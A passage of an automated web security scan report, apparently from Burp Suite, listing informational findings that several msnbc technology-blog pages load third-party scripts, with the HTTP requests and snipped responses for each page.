</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.369. http://technolog.msnbc.redacted/verizon-wireless

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /verizon-wireless

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /verizon-wireless HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:47:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119800

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.370. http://technolog.msnbc.redacted/video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:39:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129715

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.371. http://technolog.msnbc.redacted/video-games

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /video-games

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video-games HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:32:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 161941

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.372. http://technolog.msnbc.redacted/viral

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /viral

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /viral HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:38:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154010

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.373. http://technolog.msnbc.redacted/wii

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /wii

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wii HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=280
Date: Sun, 30 Jan 2011 02:44:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 141402

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.374. http://technolog.msnbc.redacted/wikileaks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /wikileaks

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wikileaks HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:41:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132475

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
